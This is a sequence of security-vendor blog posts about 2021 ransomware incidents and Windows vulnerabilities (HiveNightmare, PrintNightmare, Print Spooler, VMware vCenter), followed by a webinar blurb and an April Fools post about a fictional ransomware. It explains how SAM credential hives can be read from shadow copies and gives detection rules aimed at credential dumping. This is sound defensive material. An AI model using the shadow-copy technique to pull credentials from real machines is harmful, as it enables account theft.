Also in May, JBS, the world’s largest meat processing plant, was hit with a ransomware attack that forced the company to stop operation of all its beef plants in the U.S., and to slow production for pork and poultry. The cyberattack significantly impacted the food supply chain and highlighted the manufacturing and agricultural sectors’ vulnerability to disruptions of this nature.
The FBI identified the threat actors as the REvil ransomware-as-a-service operation. According to JBS, the threat actors targeted servers that supported their North American and Australian IT systems. The company ultimately paid a ransom of $11 million to the Russian-based ransomware gang to prevent further disruption.
9. Kaseya
Kaseya, an IT services company for MSP and enterprise clients, was another victim of REvil ransomware — this time during the July 4th holiday weekend. Although only .1% of Kaseya’s customers were breached, an estimated 800 to 1500 small to mid-sized businesses were affected through their MSP. One of those businesses included 800 Coop stores, a Sweden-based supermarket chain, that were forced to temporarily close due to an inability to open their cash registers.
The attackers identified a chain of vulnerabilities — ranging from improper authentication validation to SQL injection — in Kaseya’s on-premises VSA software, which organizations typically run in their DMZs. REvil was then able to use MSP’s Remote Monitoring and Management (RMM) tools to push out the attack to all connected agents.
10. Accenture
The ransomware gang LockBit hit Accenture, the global tech consultancy, with an attack in August that resulted in a leak of over 2,000 stolen files. The slow leak suggests that Accenture did not pay the $50 million ransom.
According to CyberScoop, Accenture knew about the attack on July 30, but did not confirm the breach until August 11, after a CNBC reporter tweeted about it. CRN criticized the firm for its lack of transparency about the attack, saying that the incident was a “missed opportunity by an IT heavyweight” to help spread awareness about ransomware.
How Blumira Helps Prevent Ransomware Attacks
A threat detection and response solution like Blumira quickly detects and alerts IT and security teams about indicators of compromise, giving remediation guidance to stop a threat actor early in the stages of a ransomware attack. Blumira detects a variety of suspicious behavior, including the creation of new admin accounts, password spraying, and open RDP ports.
Although the top ransomware attacks of 2021 were high-profile attacks on large organizations, small to medium-sized businesses are a frequent target due to limited resources and knowledge. Blumira makes it easy for smaller IT and security teams to secure their environment through simple deployment and an intuitive interface. Blumira also provides security playbooks and automated workflows to guide IT teams through security practices that help reduce the overall attack surface.
To learn more about how to defend against ransomware attacks, download our on-demand webinar. Whether you’re an IT admin with directives from leadership to prevent ransomware or you’re a small business owner that wants to get started with security, we’ve got your back.
Medium
What Happened?
On July 13, Microsoft released CVE-2021-33757, which enabled AES encryption by default to the remote protocol connection for MS-SAMR to mitigate the downgrade to RC4, which exposed data through insecure encryption. Microsoft subsequently released a patch for the vulnerability, KB5004605, which made changes related to the MS-SAMR protocol. Microsoft stated in documentation for the patch:
After installing the July 13, 2021 Windows updates or later Windows updates, Advanced Encryption Standard (AES) encryption will be the preferred method on Windows clients when using the legacy MS-SAMR protocol for password operations if AES encryption is supported by the SAM server.
On July 19, a vulnerability was discovered in Windows 10 that allows non-admins to access the Security Account Manager (SAM) database, which stores users’ passwords, according to Kevin Beaumont (Twitter user @GossiTheDog). Kevin Beaumont dubbed the vulnerability HiveNightmare aka SeriousSam.
Oh dear. I need to validate this myself, but it seems like MS may have goofed up and made the SAM database (user passwords) accessible to non-admin users in Win 10. https://t.co/cdxiH1AIuB
— Kevin Beaumont (@GossiTheDog) July 19, 2021
This was confirmed for the latest version of Windows 10, according to Benjamin Delpy, creator of MimiKatz (Twitter user @gentilkiwi).
The SYSTEM hive was also exposed during Microsoft’s ACL change to Windows, which means that all credentials are exposed in their hashed form.
How Bad is This?
The SYSTEM and SAM credential database files have been updated to include the Read ACL set for all Users for some versions of Windows. This means that any authenticated user has the capability to extract these cached credentials on the host and use them for offline cracking, or pass-the-hash depending on the environment configuration. This has only been identified on updated Windows 10 endpoints at this point, however, it is possible Windows Servers have been impacted.
The following builds have been identified as impacted so far:
- 1809 ISO-June21 – 20H2
- 1909 ISO-June21 – 20H2
- 20H2 ISO-orig – 21H1
- 21H1 ISO-June21 – 11 Insider (Windows 11)
You can identify your build by looking at winver in Run (Win + R)
As of 7/20/21, this attack pattern has been proven and is a potential privilege escalation path for attackers. If a Computer or Domain Admin has recently logged into a host that was impacted by this change, their hashed credentials would be cached on the host in these files. This could potentially give an attacker full access to your environment without requiring escalation to Administrator to access these credentials.
What Should I Do?
We recommend that you wait for Microsoft to release remediation steps. In the meantime, you can do a few things:
- Monitor for SAM access on the host itself to determine if an attacker is attempting to dump and escalate.
- Prepare to patch when Microsoft has released their fix or mitigation for this issue. This is the safest way to respond to this issue as Microsoft will need to unroll the ACL changes that they added.
- If the machine is critical to your environment from a security perspective, reset ACLs back to default across the impacted folder. This action does come with some amount of risk, as you will be changing ACLs set by the Windows update. However, so far in our testing, it has not negatively impacted the host but that does not mean it won’t impact others’ machines depending on configuration.
- From an Administrator Powershell command line
Get-ChildItem -File -Force $env:WINDIR\system32\config | ForEach-Object { icacls $_.FullName /reset
- From an Administrator Powershell command line
How To Detect
Blumira recommends monitoring for actions against the HKLM System, Security, and SAM databases on all systems. Due to this incorrect ACL change by Microsoft, it is now an even higher priority to monitor these actions. Below is an example of utilizing Sysmon to monitor for reg.exe actions against the System, Security, or SAM files.
This may require some changes based on your SIEM, e.g., escaping slashes and regex match formatting. Blumira customers who utilize Sysmon will already have this rule deployed to their environments.
windows_log_source="Microsoft-Windows-Sysmon" AND process_name LIKE "%reg.exe%" AND REGEXP_CONTAINS(command, "HKLM\\\\system|HKLM\\\\security|HKLM\\\\sam")
Blumira also recommends monitoring WMIC, Shadow-Copy, and any actions that would involve the instantiation of Mimikatz, which can all leverage this exposure.
Update 7/21/21 (courtesy of Reddit user u/eider96)
- This has nothing to do with KB5004605
- The RX access for BU\Users does not allow for direct access to these files as they are protected, they can only be accessed if previously VSS snapshot has been made with these files (which is default action given either File History or System Restore are enabled). Unprivileged users can leverage such snapshots and use the improper permissions to take out files from it. Administrator permissions are not required to read snapshot, they are directly accessible via
\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy{$N}where {$N} is snapshot number. Administrators can list all snapshots usingvssadmin list shadows. - The PS snippet provided is not meant to secure system alone. Also consider existing snapshots and either remove them or accept the risk and let them be overwritten as time goes on.
- Because the files can be copied offline from VSS snapshot and then inspected manually or hive loaded on separate system, monitoring for actions against these hives is not guaranteed to provide any meaningful results in relation to this specific vulnerability – there is no reason to modify or load the hive online in order to extract cached credentials from recovered files.
Update 7/21/21 (courtesy of Reddit user u/Oscar_Geare):
Microsoft has released a CVE for this vulnerability. In the CVE they identify that it affects all versions 1809 and newer. Additionally there is a workaround available:
- Restrict access to the contents of
%windir%\system32\config- Open Command Prompt or Windows PowerShell as an administrator.
- Run this command:
icacls %windir%\system32\config\*.* /inheritance:e
- Delete Volume Shadow Copy Service (VSS) shadow copies
- Delete any System Restore points and Shadow volumes that existed prior to restricting access to
%windir%\system32\config. - Create a new System Restore point (if desired).
- Delete any System Restore points and Shadow volumes that existed prior to restricting access to
Our comments (7/21/21):
Only delete shadow copies with some level of knowledge you do not need them. Validation of backups is ideal and you can use vssadmin list shadows to see most of your shadow copies.
Since Microsoft’s patching credibility has taken a big hit in the past few weeks, it’s not a bad idea to test the patch once implemented as well.
Update – Detections and Future Proofing (07/21/21 at 12:45 PM ET)
Since the ACL changes that occurred within the host poisoned the VSS, you can take some steps to secure a system. This includes deleting VSS snapshots once ACLs have been resolved — or at the least, protecting those VSS snapshots until they are patched and rolled over with new snapshots.
Blumira is currently testing and implementing three separate detections for this, one of which is more forward-looking to ensure visibility for hive files living inside of VSS. These detections either require Sysmon or for you to have defined advanced auditing on hosts using GPOs such as Blumira’s Logmira.
- Identification of HiveNightmare runs based on hardcoded string patterns using Sysmon. This will be easy to avoid for many attackers but will identify the reuse of existing attacks.
type='windows' AND windows_log_source='Microsoft-Windows-Sysmon' AND windows_event_id in (1,5,11) AND ((process_name LIKE '%HiveNightmare%') or (regexp_contains(target, '(?i)S.*haxx$'))) - Identification of Powershell referring to sensitive Hive files within VSS using Script Block logging. This assumes your script block logs into the info column and uses the case insensitive (?i) flag. *Requires script block logging to be enabled for Powershell.*
type='windows' AND windows_event_id=4104 AND REGEXP_CONTAINS(info, r'(?i)\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d{1,2}\\Windows\\System32\\config\\(system|security|sam)') - Identification of Read of sensitive Hive files by everyone on the host using SACLs that flow into VSS. This allows for a significant increase in visibility for any hive access in our testing thus far. This won’t change your existing VSS until another restoration point is recorded. *Requires object access GPO to be enabled (RE Logmira) and for the following Powershell to be run to enable this detection.*
type='windows' AND windows_event_id=4663 AND REGEXP_CONTAINS(object_name, r'(?i)Device\\HarddiskVolumeShadowCopy\d\\Windows\\System32\\config\\(system|security|sam)')
You will also need to run the following Powershell to enable the auditing SACL on the hive files which will then be adopted by VSS. This script adds the ReadData Success audit rule for Everyone, allowing broad future visibility into any users, permissioned or not, accessing the hive files.$files = @("C:\Windows\System32\config\system","C:\Windows\System32\config\sam","C:\Windows\System32\config\security") Foreach ($file in $files){ $acl = Get-ACL $file; $auditRule = New-Object System.Security.AccessControl.FileSystemAuditRule("Everyone", "ReadData", "Success"); $ACL.SetAuditRule($auditRule); $acl | Set-Acl $file; Write-Host "Getting ACL for $file, Audit column should state Everyone Success ReadData"; Get-ACL $file -Audit | Format-List }
Additional Resources
Try Blumira Today
Blumira can detect activity related to the HKLM System, Security, and SAM databases, as well as many other security incidents.
Blumira’s trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Sign up for a trial to start detecting and mitigating exposure related to Windows vulnerabilities
Critical
What Happened?
Jacob Baines (@Junior_Baines on Twitter), a Dragos vulnerability researcher, discovered another vulnerability in Print Spooler. Microsoft released an advisory for the vulnerability on Thursday, July 15.
How Bad is This?
It’s not as bad as the PrintNightmare vulnerabilities, one of which was classified as a remote code execution (RCE) vulnerability that allowed threat actors to execute any code on a remote machine.
CVE-2021-34481, on the other hand, enables local privilege escalation to the SYSTEM level. To compromise a system, a threat actor would need physical access, or the system would need to be already compromised.
The CVSS Severity Rating of CVE-2021-34527 was 8.8, whereas CVE-2021-34481 is rated 7.8.
Is This Related To PrintNightmare (CVE-2021-1675 and CVE-2021-34527)?
Not exactly. This vulnerability is somewhat related to Print Spooler, but in this case it is purely a local privilege exploitation (LPE) technique and therefore has a different security impact than a true RCE like PrintNightmare. According to Jacob Baines, the vulnerability is not a variant of PrintNightmare.
What Should I Do?
Microsoft recommends to stop and disable the Print Spooler service, and offers the following instructions:
However, performing this workaround would result in end users being unable to print, and many organizations consider printing a crucial business operation.
Organizations should take a similar approach to PrintNightmare and assess their exposure, consider business needs, thoroughly test any proposed changes, and win the explicit support of business leadership before making any changes to infrastructure that could impact business operations.
Why Is Print Spooler So Problematic?
The Windows Print Spooler has been a publicly known source of software vulnerabilities since 2010, with the now well-publicized Stuxnet operation that allegedly targeted Iran’s nuclear infrastructure. Spooling has been a feature of Windows and other OSes for decades, and it directly supports the critical business use of printing for many organizations. That may be the fundamental issue: legacy code that traditionally entails deliberately copying code from one device to another and privileged behind-the-scenes operations like remote driver installations are executed as part of a highly normative remote service — all against a range of attractive Windows infrastructure targets.
Microsoft is continuously updating their operating system, as seen in new releases. What’s unclear is if Windows’ own Print Spooler has been the beneficiary of any such code update in that period of time. Microsoft’s decades-long tenure as provider of the preeminent private and commercial OS also created pressure on the company to maintain reverse compatibility with older printer technology, not to mention unsupported versions of Windows. While it is common in legacy solutions to avoid breaking changes to avoid hurting critical use, this can result in long-term bugs that can be leveraged into exploits.
Thus far, Microsoft appears to favor patching very specific Spooler issues as vulnerabilities like CVE-2021-1675, CVE-2021-34527 and CVE-2021-34481 arise rather than re-code the entire legacy code set, a common approach by software vendors.
Dedicating resources to produce new Spooler code is unlikely to yield new or increased revenue as compared to other elements of a new OS. Printing is printing; the whole function can only be improved so much, and that doesn’t even account for the fact that the printing industry is in a state of decline as businesses increasingly opt for soft copies of documents rather than hard copies, and the paperless movement gains traction.
The tradeoff of the business decision means that each new OS carries legacy (maybe very legacy?) code rife with relatively discoverable vulnerabilities unknown to the original Windows Print Spooling service developers. Like the internet itself, printer spooling was largely conceived of long before security was a major software development design principle.
Medium
IT and security teams wait for Microsoft to release a permanent fix for the vulnerability dubbed PrintNightmare, but organizations must stay protected in the meantime.
In this livestream, join Blumira’s Matthew Warner, CTO and Co-Founder, Mike Behrmann, Director of Security, Patrick Garrity, VP of Operations, as well as Marius Sandbu, Guild Lead, Public Cloud at TietoEVRY. They'll discuss what they know about the vulnerability and mitigation steps to take. They’ll cover:
- Updates related to the PrintNightmare incident
- Detections you can monitor to limit your exposure while you wait for a Microsoft patch
- Tools you can use to protect your organization
- How to detect lateral movement and other tactics that attackers may use to infiltrate your Print Spooler
This interactive, conversational-style session encourages questions and engagement with viewers – so sign up today for access to our security experts.
Participants
Matt Warner, CTO and Co-Founder, Blumira
Matt has over 10 years of experience in IT and development, focusing on business strategy, development, compliance, threat detection and penetration testing. Previously, he was Director of Security Services, Development & Security at NetWorks Group, responsible for defensive information security and services.
Mike Behrmann, Director of Security, Blumira
Mike served at the National Security Agency for seven years where he focused on leading computer network exploitation operations and was later deployed to the FBI Detroit Division’s Cyber Task Force as a Threat Analyst. He joined NetWorks Group in 2015 where he and Matt Warner established the company’s Managed Detection and Response (MDR) SaaS offering and later became the MDR Team Lead. From 2017 to 2020, Mike worked as a Sr. Security Operations Engineer with Domino’s in Ann Arbor. He rejoined Matt, Nick, Amanda and the rest of the Blumira family in early 2020 as the company’s Director of Security. Mike has earned numerous Global Information Assurance (GIAC) certifications over his career and holds advanced degrees in both International Affairs and Information Assurance.
Patrick Garrity, VP of Operations, Blumira
Patrick has years of experience in the security industry, building and scaling usable security products. He currently leads Blumira’s product, sales and marketing teams. Prior to joining Blumira, he led sales engineering, product marketing and international expansion for Duo Security.
Marius Sandbu, Guild Lead, Public Cloud at TietoEVRY
Marius is a Guild Lead of Public Cloud for TietoEVRY in Norway, where his main focus is end user computing and cloud native services. He is the author of books such as Mastering Citrix NetScaler and Getting started on Citrix NetScaler. Marius is a Microsoft MVP for Azure, Veeam Vanguard, vExpert EUC Champion, NVIDIA GRID Community Advisor, and Citrix CTP. He also blogs at msandbu.org.
Medium
The recent Print Spooler exploit has created confusion for security and IT teams struggling to keep their organizations protected in the midst of a major vulnerability.
In this webinar, Matthew Warner, CTO and Co-Founder and Mike Behrmann, Director of Security at Blumira discuss the implications and remediation recommendations for this vulnerability. They’ll cover:
- How to balance the needs of the business with the needs of your security team
- Detections you can monitor to limit your exposure
- Which tools you can use to protect your organization
- How to detect lateral movement and other tactics that attackers may use to infiltrate your Print Spooler
This interactive, conversational-style session encourages questions and engagement with viewers – so sign up today for access to our security experts.
Participants
Matt Warner, CTO and Co-Founder, Blumira
Matt has over 10 years of experience in IT and development, focusing on business strategy, development, compliance, threat detection and penetration testing. Previously, he was Director of Security Services, Development & Security at NetWorks Group, responsible for defensive information security and services.
Mike Behrmann, Director of Security, Blumira
Mike served at the National Security Agency for seven years where he focused on leading computer network exploitation operations and was later deployed to the FBI Detroit Division’s Cyber Task Force as a Threat Analyst. He joined NetWorks Group in 2015 where he and Matt Warner established the company’s Managed Detection and Response (MDR) SaaS offering and later became the MDR Team Lead. From 2017 to 2020, Mike worked as a Sr. Security Operations Engineer with Domino’s in Ann Arbor. He rejoined Matt, Nick, Amanda and the rest of the Blumira family in early 2020 as the company’s Director of Security. Mike has earned numerous Global Information Assurance (GIAC) certifications over his career and holds advanced degrees in both International Affairs and Information Assurance.
Erica Mixon, Content Marketing Manager, Blumira
Erica has over five years of experience covering the tech industry. Prior to joining Blumira, she was a senior editor at TechTarget, where she wrote about enterprise IT topics such as virtualization, Windows 10, and data center management. She holds a Bachelor’s degree in writing, literature and publishing from Emerson College.
About Blumira’s Security Advisors Series
Blumira’s Security Advisor Series is a weekly virtual roundtable with experts in the information security and compliance industry offering insight into timely security topics. These interactive sessions encourage questions from the audience and engagement with viewers. Our mission is to bring awareness to current cybersecurity issues and provide trusted security advisors to the broader community
Critical
Proof-of-concept exploit code was published on Github on June 29, 2021 for a vulnerability (CVE-2021-1675) in Print Spooler (spoolsv.exe), a Windows program that manages print jobs.
In this webinar, Nato Riley, Integrations Engineer at Blumira will discuss the implications and remediation recommendations for this vulnerability. He'll cover:
- Detections you can monitor to prevent the vulnerability from making an impact on your organization
- Similar dependency-based attacks, and what we can learn from them
- Which tools you can use to protect your organization
This interactive, conversational-style session encourages questions and engagement with viewers — so sign up today for access to our security experts.
Participants
Nato Riley, Integrations Engineer, Blumira
Nato is dedicated to helping Blumira build the most effective and efficient SIEM on the market for small to mid-sized businesses. Prior to joining Blumira, he held roles at LogRhythm and Data Network Group. Other ventures include notiaPoint, Inc., where Nato invented the Olympiad, a toolbox that makes large scale projects and deployments for cloud development projects more secure and agile. In his spare time, Nato runs a YouTube channel, Nato as Code, where he discusses topics such as infrastructure as code and building a cybersecurity career.
Patrick Garrity, VP of Operations
Patrick has years of experience in the security industry, building and scaling usable security products. He currently leads Blumira’s product, sales and marketing teams. Prior to joining Blumira, he led sales engineering, product marketing and international expansion for Duo Security.
Critical
What Happened?
Proof-of-concept exploit code was published on Github on June 29, 2021 for a vulnerability (CVE-2021-1675) in Print Spooler (spoolsv.exe), a Windows program that manages print jobs.
The incident, dubbed by the internet community as “PrintNightmare,” involves two vulnerabilities:
- CVE 2021-1675: A vulnerability that allows an attacker with low access privileges to use a malicious DLL file to escalate privilege. Threat actors can only take advantage of the vulnerability if they have direct access to the vulnerable system, so Microsoft categorized it as low-risk. The June 2021 Security Updates included a successful patch for CVE 2021-1675.
- CVE 2021-34527: A remote code execution (RCE) vulnerability that allows threat actors to remotely inject DLLs. Microsoft rated CVE 2021-34527 as 8.8 out of 10 on the Common Vulnerability Scoring System Scale.
Microsoft clarified the difference in an update: This vulnerability [CVE-2021-34527] is similar but distinct from the vulnerability that is assigned CVE-2021-1675. The attack vector is different as well. CVE-2021-1675 was addressed by the security update released on June 8, 2021.
Print Spooler has been around since the 90s, and comes with a long history of bugs and vulnerabilities. In May 2020, Microsoft patched CVE-2020-1048 (aka PrintDemon), a vulnerability in Print Spooler that enabled attackers to write arbitrary data to any file on the system.
On July 6, Microsoft released an emergency out-of-band patch for PrintNightmare (KB5005010) for Windows Server 2019 and Windows 10, but not Windows Server 2012 and 2016. According to Benjamin Deply, creator of MimiKatz, the patch does not block RCE or LPE with Point and Print enabled.
How Bad is This?
CVE 2021-34527 is pretty bad. The exploit code can result in a total compromise of Windows systems. The vulnerability affects versions of Windows Server (2004, 2008, 2008 R2, 2012, 2012 R2, 2016, 2019, 20H2) and Windows (7, 8.1, RT 8.1, 10).
Microsoft classified CVE 2021-34527 as a remote code execution (RCE) issue that can allow attackers to take full control of Windows systems when they are unpatched.
This vulnerability takes advantage of a default configuration feature on domain controllers (DCs). Authenticated users should be able to perform this exploit directly against Domain Controllers without the need to elevate privileges, making this an extremely severe situation.
What Should I Do?
First, assess your exposure. You can evaluate your organization’s exposure to PrintNightmare in a few ways:
- Determine where spoolers are running, and who has permission to start those spoolers
- Check in with your organization’s AD admin and evaluate the Printer AD Group. Evaluate how your environment is structured and who can access what.
- Run the PowerShell command to get your spooler use statistics to determine if it is in use:
Get-WMIObject Win32_PerfFormattedData_Spooler_PrintQueue | Select Name, @{Expression={$_.jobs};Label="CurrentJobs"}, TotalJobsPrinted, JobErrors - Evaluate your patching process and make a decision on whether you will use the emergency patch or wait for a more comprehensive patch from Microsoft.
If you decide to apply the Microsoft patch, be aware that Point and Print-enabled systems may still be at risk.
You can also adjust RestrictDriverInstallationToAdministrators registry value to prevent non-administrators from installing printer drivers on a print server. Be aware that making changes to the Windows registry can result in detrimental changes to your system if not properly executed, so it is important to have a full understanding of those risks.
If you decide not to patch, remember that removing the ability for an attack to access servers from the internet relies on proper segmentation and least privilege being enabled. Ensure that devices directly connected to the internet and high-profile servers (such as AD Domain Controllers) are investigated for remediation first.
You should disable Print Spooler on all Active Directory Domain Controllers wherever possible.
Note: Disabling or removing the print spooler will remove the ability to print to or from that device. This should be done with caution and planning.
There are a few ways to disable it in Windows 10, including via Settings, Command Prompt, or System Configuration.
Alternatively, Point and Print, one of the critical elements of the exploit, can also be disabled via the registry using the following command:
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" /v Restricted /t REG_DWORD /d 0 /f
How to Detect
Blumira security experts are actively working with the proof of concept code in the lab to develop detection solutions for customers, and will update this article accordingly.
Enabling Sysmon will ensure that you have more visibility over your environment.
We recommend that affected organizations update their NXLog Configuration. The new version of nxlog.conf is listed here: https://github.com/Blumira/Flowmira
Updating the file and forcing a restart of the service will enable the forwarding of the Windows Print Service event logs.
Additional Path in nxlog.conf = <Select Path="Microsoft-Windows-PrintService/Admin">*</Select>\
<Select Path="Microsoft-Windows-PrintService/Operational">*</Select>\
Then, you should detect activity for the following Event IDs in Windows Event Viewer:
- PrintService/Operational EventID 808 (Failed import of DLL)
- SmbClient/Security EventID 31017 (Rejected SMB)
- EventID 316
You may also detect suspicious child processes related to the spool’s binary as a parent process.
How Blumira Protects Against PrintNightmare
Blumira’s security team released a new detection rule to all customers that identifies behavior closely associated with PrintNightmare. The rule, which is built into Blumira’s threat detection and response platform, detects potential exploit attempts of the Windows Print Spooler service based on Blumira’s own verified lab research.
Blumira’s security experts also include recommendations when a finding is detected. In this case, we recommend that customers review DLLs from the error message. For incident response steps, Blumira recommends moving forward with the containment stage of response immediately by taking the victim device offline, suspending related user accounts, and monitoring for other suspicious behavior.
Watch Our On-Demand Livestream
In this livestream, join Blumira’s Matthew Warner, CTO and Co-Founder, Mike Behrmann, Director of Security, Patrick Garrity, VP of Operations, as well as Marius Sandbu, Guild Lead, Public Cloud at TietoEVRY. They’ll discuss what they know about the vulnerability and mitigation steps to take. Secure your spot here.
Critical
While investigating several recent ransomware attacks, the Blumira security research team discovered a new variant of ransomware that will only accept Dogecoin as payment. We’ve named the ransomware variant OnlyDoge for this reason.
This dangerous variant furiously sniffs packets in an attempt to obtain Doge cookies and gain access to sensitive data. This makes it difficult to detect and remediate as it spreads like wildfire. Unlike other adversaries that gain access via a backdoor, OnlyDoge infiltrates systems via a Dogedoor.
“OnlyDoge is one of the most destructive ransomware variants we’ve seen. The combination of automating remote code execution and requiring Doge as ransomware payment has increased its effectiveness,” said Matt Warner, CTO of Blumira. “It’s hard for anyone to take this threat seriously because … well, it’s Doge.”
OnlyDoge victims are forced to pay the Doge ransom because they have no alternative to recover. However, organizations are unsure of how to acquire Dogecoin because it’s not available on common cryptocurrency exchanges such as Coinbase. Security analysts also face criticism from their kids about Doge being just a funny meme.
OnlyDoge is putting stress on security programs that we haven’t seen before. Every organization should consider HODLing Dogecoin as a response to the outbreak.
The new breed of OnlyDoge ransomware is spreading fast and there are rumors that new variants will pop up and accept other forms of payment such as NFTs, UniSocks and PancakeSwap.
We noticed that this variant spun up shortly after Elon Musk started tweeting about his passion for Doge and suspect that it might have served as the adversary’s inspiration for building this new ransomware variant.
Unlike other ransomware variants, OnlyDoge exists only in the wild imaginations of Blumira employees and is therefore impossible to replicate. After April Fool’s Day, the attack will be only a doggone memory.
Medium
Brought to you by:
As security threats and risk have continued to evolve there is a need to detect and respond to the most common threats, techniques and tactics used that result in security incidents and breaches.
Join Lucidia and Blumira in this webinar as we cover:
- The "Sweet 16" of security threats
- Risks and misconfigurations that most commonly result in a breach
- How to mitigate from being impacted by the "Sweet 16"
This interactive, conversational-style session encourages questions and engagement with viewers – so sign up today for access to our security experts.
Low
In Intel 471’s Ransomware Variants report, they found that 34 ransomware variants launched 722 attacks from October to December 2021.
This was an increase of 110 attacks compared to the previous quarter.
Source: Intel 471
Some of the top variants of ransomware (that is, the most active) tracked in the second half of last year can be found below, along with a synopsis of who it affects, how it works, how it evades detection and details about the infection chain.
Learn about the top variants of ransomware (that is, the most active), along with who it affects, how it works, how it evades detection and details about the infection chain.
Lockbit 2.0
Lockbit 2.0 was the most prominent ransomware variant in Q4 of 2021 and was responsible for 29% of all reported attacks, according to Intel 471. The variant is known as ransomware as a service (SaaS) – the operators rent access to the ransomware strain, but rely on other attackers to compromise corporate networks to deploy it.
Formerly known as ABCD ransomware, the RaaS group emerged in 2019. As of October 2021, Lockbit 2.0 had 203 victims on its leak site. Of those victims, over 80% of its victims are small to medium-sized businesses (SMBs), according to Trend Micro.
Lockbit 2.0 has continued to be active in 2022, prompting the FBI to issue a warning in February. The group uses a variety of techniques, tactics and procedures (TTPs) to launch an attack, which creates challenges for defense teams. It also relies on obfuscation techniques such as decoding strings and self-deleted files to evade detection.
For initial access, Lockbit 2.0 has used tactics such as purchased access, unpatched vulnerabilities, and zero day exploits. Once in an environment, threat actors use tools such as Mimikatz to escalate privileges.
Conti Ransomware
Conti was the most active ransomware group in 2021 in Palo Alto Networks’ Unit 42, according to its report.
This type of ransomware is human-operated and will steal information, threatening to expose it in addition to encrypting it. It is known as leveraging fileless attack methods to make it more difficult for analysts to investigate.
In a report from Sophos, they found that attackers were able to compromise a target’s network and gain access to domain admin credentials – within 16 minutes of exploiting a vulnerable firewall. The attackers then deployed Cobalt Strike beacons to servers to help deploy the ransomware attack.
Indicators of compromise can be found on the Sophos Github.
Egregor Ransomware
A relatively newer ransomware spotted in 2020, Egregor has been involved in attacks against retailers like Kmart, Ubisoft, Barnes & Noble and the Vancouver Metro System (MalwareBytes & Fortiguard Labs). It affects Windows-based operating systems, and targets well-known organizations, random individuals and small businesses.
Egregor has been distributed through Cobalt Strike, used to deliver and launch payloads. According to Malwarebytes, targeted environments are initially compromised through various means including brute-forcing RDP ports and phishing.
Ryuk Ransomware
Late in 2020, a number of U.S. agencies released an advisory of widespread Ryuk ransomware attacks targeting healthcare and public health sector organizations.
First seen in 2018, Ryuk is spread through tools like Cobalt Strike and PowerShell Empire, as well as Mimikatz to dump plaintext Windows passwords or hash values.
Attackers evade detection by leveraging native Windows tools to perform network discovery and move laterally throughout a network, a technique known as Living of the Land (LotL) – using already-existing legitimate tools to conduct malicious activity.
Learn more in RyukRansomware Targets Healthcare Organizations.
Thanos Ransomware
Initially detected in January 2020, Thanos is known as a ransomware as a service, allowing attackers to create custom ransomware payloads with developer assistance, according to BleepingComputer.
It affects Windows users and uses tactics to bypass detection by Windows Defender (an antivirus program), as reported by Fortinet. It also leverages commands to stop or bypass detection by other popular antivirus software. Other attack campaigns included delivering a variant of Thanos via Microsoft Excel email attachments, disguised as fake billing and tax repayment documents.
A new Thanos variant was seen targeting a computer’s MBR (master boot record) as part of its infection chain, attempting to lock users out (Security Intelligence). An attack against organizations in the Middle East and North Africa delivered Thanos, including a ransom for $20,000 of bitcoin.
Ragnar Ransomware
First seen in December 2019, Ragnar Locker targets Fortune 500 and other companies, using a variety of techniques to get network access and move laterally throughout an environment.
Ragnar leverages native Windows administrative tools like PowerShell, Windows Group Policy Objects (GPO) for lateral movement. It targets RDP (Remote Desktop Protocol) connections, exploits managed service providers’ remote management software and domain admin access to gain a foothold in networks and elevate privileges.
It’s one of the ransomware variants seen not only encrypting files, but also exfiltrating data to blackmail victims into paying a ransom.
Learn more in Protecting AgainstRagnar Locker Ransomware.
WastedLocker Ransomware
Last year, wearable tech manufacturer Garmin fell victim to the WastedLocker ransomware. WastedLocker attempts to avoid detection by behavior-based anti-ransomware tools, according to Sophos.
Similar to other types of ransomware, it leverages existing Windows features, interacting with Windows API functions from within the memory itself, according to ZDNet. It can also encrypt cached documents in memory to avoid detection by behavior-monitoring software.
In past attacks, WastedLocker campaigns often start with using stolen login credentials. If they have admin credentials not protected by multi-factor authentication, they can easily access a target’s systems through VPN and then disable any security tools.
Phobos/EKING Ransomware
First spotted in early 2019, The attackers behind Phobos often will target smaller businesses. Phobos often pushes out new variants that evolve their attack methods (Fortinet). In one sample, researchers found a Microsoft Word document with malicious Macro designed to spread the EKING variant on an affected system.
Phobos will scan files on logical drives, network sharing resources and new attached logical drives before encrypting files. In addition to encrypting files, it can terminate active operating system processes, delete local backups, disable recovery mode and your firewall to stop you from rebooting a device to stop the infection (Heimdal Security).
BazarLoader Ransomware
This is a Trojan commonly used to deploy Ryuk ransomware, targeting high-value enterprise targets (BleepingComputer). It’s chosen for its covertness, minimal functionality and obfuscation layer that better evades detection by security tools.
A compromise often starts with a targeted phishing attack, then injection of the BazarLoader backdoor component into legitimate Windows processes like cmd.exe, explorer.exe and svchost.exe. It will deploy a Cobalt Strike beacon that calls for additional exploitation tools that can map a Windows domain and extract credentials.
Ransomware Prevention & Detection
As commonly seen among the top most-active ransomware variants, they typically:
- Leverage stolen, weak or brute-forced credentials for initial access, sometimes via phishing attempts
- Target RDP connections and VPN credentials to log in and turn off security tools
- Evade detection by common security solutions (including Windows Defender and other antivirus software) by using legitimate Windows features to move laterally and deploy additional malicious payloads
- Use certain tools like Cobalt Strike, PowerShell Empire, Mimikatz to assist with ransomware attacks
- Exfiltrate or steal data for blackmail, threatening to release it publicly unless the targeted organization pays the ransom
Blumira can help your organization prevent, detect and respond to attacks before they result in ransomware infection. Our platform detects attackers throughout each stage of a ransomware attack, including scanning, credential access, privilege escalation, data exfiltration and malicious file execution.
Learn more in Ransomware Prevention & Detection and try Blumira’s cloud SIEM for free – deploy in hours to start detecting unknown threats in your environment today.
Critical
What Happened
Positive Technologies discovered a vulnerability in VMware vCenter/vSphere that allows an unauthenticated attacker to remotely execute code on the VMware hypervisor (CVE-2021-21972). The vulnerability was first reported to the vendor on October 2 2020, and a patch was released by VMware on February 23 2021.
Is a weaponized exploit available yet?
Proof of concept code has indeed been released to GitHub shortly after the patch was released allowing any attacker with access to the code the ability to take advantage of the vulnerability.
How Bad is This?
Bad. Any threat actor who can reach port 443 on your vCenter server can completely compromise the device, the data, and any VMs it contains.
Several exploits are now public – you should expect that these will be used immediately to facilitate attacks. Scanning for vulnerable systems has been seen:
We’ve detected mass scanning activity targeting vulnerable VMware vCenter servers (https://t.co/t3Gv2ZgTdt).
